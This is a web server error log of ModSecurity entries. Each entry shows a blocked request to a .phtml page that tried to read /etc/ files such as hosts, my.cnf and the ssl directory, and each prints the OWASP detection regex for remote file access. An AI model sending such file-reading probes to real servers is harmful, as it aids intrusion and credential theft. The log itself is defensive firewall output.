[Fri Mar 20 08:57:02.659230 2026] [:error] [pid 15826:tid 140411658000128] [client 57.141.18.83:58328] [client 57.141.18.83] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02DuoXxyEfFpUF8f-LmwAAAUo"]
[Fri Mar 20 08:57:02.838337 2026] [:error] [pid 7235:tid 140411548894976] [client 57.141.18.75:58332] [client 57.141.18.75] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02DvqxLDW4GITHUkT0bgAAARc"]
[Fri Mar 20 08:57:03.600511 2026] [:error] [pid 10189:tid 140411616036608] [client 57.141.18.14:58346] [client 57.141.18.14] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/tcsd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02DzJ3M9BSuKP7CAYp4gAAAI8"]
[Fri Mar 20 08:57:03.957489 2026] [:error] [pid 15826:tid 140411607643904] [client 57.141.18.103:58354] [client 57.141.18.103] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/networkmanager"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02D-oXxyEfFpUF8f-LnAAAAVA"]
[Fri Mar 20 08:57:04.143215 2026] [:error] [pid 21219:tid 140411733534464] [client 57.141.18.124:58360] [client 57.141.18.124] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/networks"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02EPXLqtnMIWvjpaKlxAAAAoE"]
[Fri Mar 20 08:57:04.368903 2026] [:error] [pid 21219:tid 140411616036608] [client 57.141.18.87:58366] [client 57.141.18.87] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02EPXLqtnMIWvjpaKlxQAAAo8"]
[Fri Mar 20 08:57:04.496408 2026] [:error] [pid 21219:tid 140411658000128] [client 57.141.18.66:58368] [client 57.141.18.66] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hosts"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02EPXLqtnMIWvjpaKlxgAAAoo"]
[Fri Mar 20 08:57:04.874020 2026] [:error] [pid 7235:tid 140411641214720] [client 57.141.18.83:58376] [client 57.141.18.83] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02EPqxLDW4GITHUkT0cAAAAQw"]
[Fri Mar 20 08:57:05.567128 2026] [:error] [pid 26799:tid 140411649607424] [client 57.141.18.91:58386] [client 57.141.18.91] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/percona-server.cnf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02Eda6ubjKNq_cu4bhBAAAA0s"]
[Fri Mar 20 08:57:05.803734 2026] [:error] [pid 15826:tid 140411708356352] [client 57.141.18.61:58390] [client 57.141.18.61] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02EeoXxyEfFpUF8f-LnQAAAUQ"]
[Fri Mar 20 08:57:06.312030 2026] [:error] [pid 10189:tid 140411741927168] [client 57.141.18.26:58402] [client 57.141.18.26] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02EjJ3M9BSuKP7CAYp4wAAAIA"]
[Fri Mar 20 08:57:06.335958 2026] [:error] [pid 7235:tid 140411565680384] [client 57.141.18.1:58404] [client 57.141.18.1] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02EvqxLDW4GITHUkT0cgAAARU"]
[Fri Mar 20 08:57:06.591564 2026] [:error] [pid 7235:tid 140411540502272] [client 57.141.18.32:58414] [client 57.141.18.32] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/odbcinst.ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02EvqxLDW4GITHUkT0dAAAARg"]
[Fri Mar 20 08:57:06.835004 2026] [:error] [pid 15826:tid 140411741927168] [client 57.141.18.33:58416] [client 57.141.18.33] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02EuoXxyEfFpUF8f-LngAAAUA"]
[Fri Mar 20 08:57:07.490950 2026] [:error] [pid 7235:tid 140411574073088] [client 57.141.18.12:58406] [client 57.141.18.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02E_qxLDW4GITHUkT0dQAAARQ"]
[Fri Mar 20 08:57:07.585175 2026] [:error] [pid 7235:tid 140411624429312] [client 57.141.18.2:58434] [client 57.141.18.2] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02E_qxLDW4GITHUkT0dgAAAQ4"]
[Fri Mar 20 08:57:07.932035 2026] [:error] [pid 31215:tid 140411716749056] [client 57.141.18.109:58438] [client 57.141.18.109] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02EwF0L0L-SsrnPo5z7AAAAsM"]
[Fri Mar 20 08:57:08.071025 2026] [:error] [pid 7893:tid 140411733534464] [client 57.141.18.101:58444] [client 57.141.18.101] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02FBCii7xarUs8iHZycgAAAgE"]
[Fri Mar 20 08:57:08.701629 2026] [:error] [pid 7893:tid 140411540502272] [client 57.141.18.76:58466] [client 57.141.18.76] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/protocols"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02FBCii7xarUs8iHZycwAAAhg"]
[Fri Mar 20 08:57:08.756064 2026] [:error] [pid 26799:tid 140411716749056] [client 57.141.18.76:58468] [client 57.141.18.76] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/securetty"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02FNa6ubjKNq_cu4bhBgAAA0M"]
[Fri Mar 20 08:57:09.671006 2026] [:error] [pid 15826:tid 140411624429312] [client 57.141.18.41:58484] [client 57.141.18.41] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/my.cnf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02FeoXxyEfFpUF8f-LoQAAAU4"]
[Fri Mar 20 08:57:09.898147 2026] [:error] [pid 10189:tid 140411574073088] [client 57.141.18.93:58494] [client 57.141.18.93] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02FTJ3M9BSuKP7CAYp5QAAAJQ"]
[Fri Mar 20 08:57:09.984398 2026] [:error] [pid 21219:tid 140411708356352] [client 57.141.18.35:58498] [client 57.141.18.35] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/resolv.conf.save"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02FfXLqtnMIWvjpaKlxwAAAoQ"]
[Fri Mar 20 08:57:10.254112 2026] [:error] [pid 10189:tid 140411624429312] [client 57.141.18.34:58510] [client 57.141.18.34] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/nsswitch.conf.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02FjJ3M9BSuKP7CAYp5gAAAI4"]
[Fri Mar 20 08:57:10.638655 2026] [:error] [pid 15826:tid 140411616036608] [client 57.141.18.32:58520] [client 57.141.18.32] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/locales.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02FuoXxyEfFpUF8f-LogAAAU8"]
[Fri Mar 20 08:57:10.939998 2026] [:error] [pid 26799:tid 140411607643904] [client 57.141.18.18:58530] [client 57.141.18.18] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02Fta6ubjKNq_cu4bhBwAAA1A"]
[Fri Mar 20 08:57:11.527854 2026] [:error] [pid 9818:tid 140411599251200] [client 57.141.18.57:58552] [client 57.141.18.57] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02F11pVZ5mVmJwsFM8sgAAAFE"]
[Fri Mar 20 08:57:11.963119 2026] [:error] [pid 7893:tid 140411616036608] [client 57.141.18.74:58580] [client 57.141.18.74] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02FxCii7xarUs8iHZydQAAAg8"]
[Fri Mar 20 08:57:12.051862 2026] [:error] [pid 7893:tid 140411574073088] [client 57.141.18.34:58584] [client 57.141.18.34] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/vimrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/decury/rubytail013917985183.phtml"] [unique_id "ab02GBCii7xarUs8iHZydgAAAhQ"]
